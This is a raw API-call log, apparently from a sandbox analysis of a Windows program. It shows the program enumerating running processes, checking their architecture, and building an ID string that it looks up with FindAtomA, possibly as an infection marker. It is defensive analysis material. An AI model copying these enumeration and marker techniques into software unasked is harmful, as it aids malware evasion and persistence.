	[0073.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.108] CloseHandle (hObject=0x224) returned 1
	[0073.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728a18, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.108] CloseHandle (hObject=0x224) returned 1
	[0073.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.108] CloseHandle (hObject=0x224) returned 1
	[0073.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.109] CloseHandle (hObject=0x224) returned 1
	[0073.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.109] CloseHandle (hObject=0x224) returned 1
	[0073.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.109] CloseHandle (hObject=0x224) returned 1
	[0073.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728818, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.109] CloseHandle (hObject=0x224) returned 1
	[0073.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.110] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.110] CloseHandle (hObject=0x224) returned 1
	[0073.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc50, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.110] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.110] CloseHandle (hObject=0x224) returned 1
	[0073.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7288b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.110] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.110] CloseHandle (hObject=0x224) returned 1
	[0073.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72ea40, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.110] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.110] CloseHandle (hObject=0x224) returned 1
	[0073.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.110] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.110] CloseHandle (hObject=0x224) returned 1
	[0073.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.111] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.111] CloseHandle (hObject=0x224) returned 1
	[0073.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.111] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.111] CloseHandle (hObject=0x224) returned 1
	[0073.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728858, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0073.111] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.111] CloseHandle (hObject=0x224) returned 1
	[0073.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7288f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.111] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.111] CloseHandle (hObject=0x224) returned 1
	[0073.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.111] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.111] CloseHandle (hObject=0x224) returned 1
	[0073.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.112] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.112] CloseHandle (hObject=0x224) returned 1
	[0073.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72eb08, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.112] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.112] CloseHandle (hObject=0x224) returned 1
	[0073.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.112] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.112] CloseHandle (hObject=0x224) returned 1
	[0073.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.112] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.112] CloseHandle (hObject=0x224) returned 1
	[0073.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.112] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.112] CloseHandle (hObject=0x224) returned 1
	[0073.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.113] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.113] CloseHandle (hObject=0x224) returned 1
	[0073.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7289b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.113] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.113] CloseHandle (hObject=0x224) returned 1
	[0073.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72eab8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.113] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.113] CloseHandle (hObject=0x224) returned 1
	[0073.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e6a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.113] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.113] CloseHandle (hObject=0x224) returned 1
	[0073.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.113] GetLastError () returned 0x5
	[0073.113] GetLastError () returned 0x5
	[0073.113] GetLastError () returned 0x5
	[0073.113] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.114] GetLastError () returned 0x5
	[0073.115] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.115] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.115] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.115] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.116] GetLastError () returned 0x5
	[0073.117] GetLastError () returned 0x5
	[0073.117] GetLastError () returned 0x5
	[0073.117] GetLastError () returned 0x5
	[0073.117] GetLastError () returned 0x5
	[0073.117] GetLastError () returned 0x5
	[0073.117] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.117] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.117] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.117] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.117] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.117] CloseHandle (hObject=0x224) returned 1
	[0073.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.117] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.118] CloseHandle (hObject=0x224) returned 1
	[0073.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.118] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.118] CloseHandle (hObject=0x224) returned 1
	[0073.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.166] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
